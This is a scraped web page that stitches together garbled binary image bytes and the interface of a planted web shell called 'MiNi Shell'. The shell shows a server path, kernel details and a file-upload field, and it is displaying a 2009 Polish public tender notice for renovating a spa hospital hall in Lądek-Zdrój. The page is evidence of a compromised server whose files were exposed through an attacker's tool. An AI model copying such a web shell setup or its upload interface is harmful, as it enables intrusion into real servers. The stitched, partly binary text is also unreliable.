JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090915/156403-N-2009.html

<p class="kh_header"><b>Lądek-Zdrój: Remont hallu głównego w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju</b><br>
<b>Numer ogłoszenia: 156403 - 2009; data zamieszczenia: 15.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 074 8146434, 8146227 w. 265, faks 074 8147107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Skarbu Państwa - NZOZ.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont hallu głównego w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Remont hallu głównego w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju w następującym zakresie:
Roboty ogólnobudowlane-     
wykucie starej stolarki drzwiowej,
demontaż ścian z płyt gipsowo - kartonowych,
demontaż wiatrołapu,
demontaż  istniejącego wyposażenia hallu,
wykonanie wiatrołapu w konstrukcji aluminiowej z drzwiami automatycznie  przesuwanymi,
odnowienie ścian i stropów przez odbicie odstających tynków, uzupełnienie  tynków,  szpachlowanie, malowanie ścian i sufitów,
wymurowanie ścianek recepcji,
demontaż  istniejącej i montaż  nowej balustrady schodów ze stali nierdzewnej z  wypełnieniem szkłem,
wykonanie sufitu podwieszonego w systemie THERMATEX  w module 600x600 z  wypełnieniem płytami FRESKO, 
obłożenie słupów płytami marmurowymi,
obłożenie lady recepcji i kiosku płytami marmurowymi,
pomalowanie istniejącej ślusarki okiennej farbą w kolorze ecru,
otynkowanie podokienników i słupów w miejscach nie obłożonych marmurem masą  tynkarską MARMURIT nr 244   grubości 1,5 mm,
renowacja istniejącej posadzki hallu.
Roboty sanitarne:        
montaż pompy i zbiornika przelewowego fontanny,
Roboty elektryczne:    
wykonanie nowej linii zasilającej hallu z istniejącej  rozdzielnicy na parterze,
wykonanie nowej instalacji oświetleniowej ,
wykonanie instalacji elektrycznych gniazd, zasilania fontann,
montaż opraw oświetleniowych, łączników i gniazd,
wykonanie instalacji do stanowisk komputerowych i recepcji.
Wyposażenie:
lady w recepcji i kiosku,
fontanna,
regały w recepcji,
szafa w kiosku,
siedziska skórzane,
stoły kamienne,
kwietniki stałe,
donice,
system mocowania pnączy MEGA,
gablota 1330x1960 podświetlona,
kinkiety,
latarnie kute,
stanowiska komputerowe.

Zamówienie zawiera się w kwocie o wartości szacunkowej poniżej progów ustalonych na podstawie art. 11 ust. 8 Prawa zamówień publicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.00-6, 45.40.00.00-1, 45.43.21.00-5, 45.42.10.00-4, 45.26.25.12-3, 45.33.20.00-3, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium  dla całości przedmiotu zamówienia w kwocie 4 000.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie  mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art.22 ust 1 ustawy Pzp i:
-  posiadają uprawnienia do wykonywania działalności lub czynności, o której mowa w przedmiocie zamówienia, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
-  posiadają niezbędną wiedzę i doświadczenie  oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
-  znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,  
- wykonali w okresie  ostatnich 5 lat przed dniem wszczęcia postępowania o  udzielenie   zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie (co najmniej 2  zamówienia) odpowiadające swoim rodzajem  przedmiotowi zamówienia ( z aranżacją wnętrz łącznie, o kubaturze i powierzchni pomieszczeń nie mniejszej niż przedmiot zamówienia ) i o wartości nie mniejszej niż 200 000 zł. (netto). Wykonawca zobowiązany jest dołączyć  dokumenty (referencje) potwierdzające, że roboty zostały wykonane należycie,
- wykażą, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, zgodne z  ustawą Prawo Budowlane w branży konstrukcyjno-budowlanej, elektrycznej, sanitarnej,
- posiadają ubezpieczenie od odpowiedzialności cywilnej (deliktowej i kontraktowej)  w zakresie prowadzonej działalności, zgodnej z przedmiotem niniejszego zamówienia, na minimalną sumę ubezpieczenia 200 000 zł. (słownie: dwieście  tysięcy złotych),
-  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo reprezentowania  w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego,  każdy z Wykonawców musi spełniać warunki określone w SIWZ.

Ocena spełnienia warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków określonych w SIWZ Wykonawca załączy do oferty następujące dokumenty i oświadczenia:
oświadczenie z art. 22 ust 1 i art. 24 ustawy PZP, które stanowi załącznik nr 2 do SIWZ,
aktualny  odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej ( deliktowej i kontraktowej) w zakresie prowadzonej działalności, zgodnej z przedmiotem  niniejszego zamówienia, na minimalną sumę ubezpieczenia 200 000 zł. (słownie: - dwieście tysięcy zł.),
wykaz wykonanych robót budowlanych w okresie ostatnich pięciu  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 zamówień odpowiadających swoim rodzajem przedmiotowi zamówienia (z aranżacją wnętrz łącznie, o kubaturze i powierzchni pomieszczeń nie mniejszej niż przedmiot zamówienia) i o wartości nie mniejszej niż 200 000 zł (netto) wraz z referencjami potwierdzającymi należyte wykonanie wymienionych robót, zgodnie z zał. nr 4 do SIWZ,
wykaz personelu kierowniczego przy realizacji zamówienia wraz z kopiami odpowiednich  uprawnień, kwalifikacji  i zaświadczeń o  przynależności do OIIB,   zgodnie z zał. nr 6 do SIWZ,
kosztorys ofertowy sporządzony ściśle wg  załącznika do SIWZ -  przedmiaru robót: instalacje wodne, przedmiaru robót: budowlane, przedmiaru robót: elektryczne i zestawienia wyposażenia,  
wykaz robót powierzonych podwykonawcom - zgodnie z zał. nr 7 do SIWZ,
formularz ofertowy- zgodnie z zał. nr 1 do SIWZ,  
oświadczenie o nie zaleganiu z płatnościami w ZUS i US , o niekaralności i  finansowe - zgodnie z zał. nr 5 do SIWZ,
zaakceptowany projekt umowy zgodnie z zał. nr 3..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 75</li>
<li>2 - Okres gwarancji - 25</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole SA, ul. Wolności 4, 57-540 Lądek Zdrój, pokój nr 204 
(Zamówienia Publiczne).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 10:00, miejsce: Uzdrowisko Lądek-Długopole SA, ul. Wolności 4, 57-540 Lądek Zdrój, pokój nr 105 
(Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com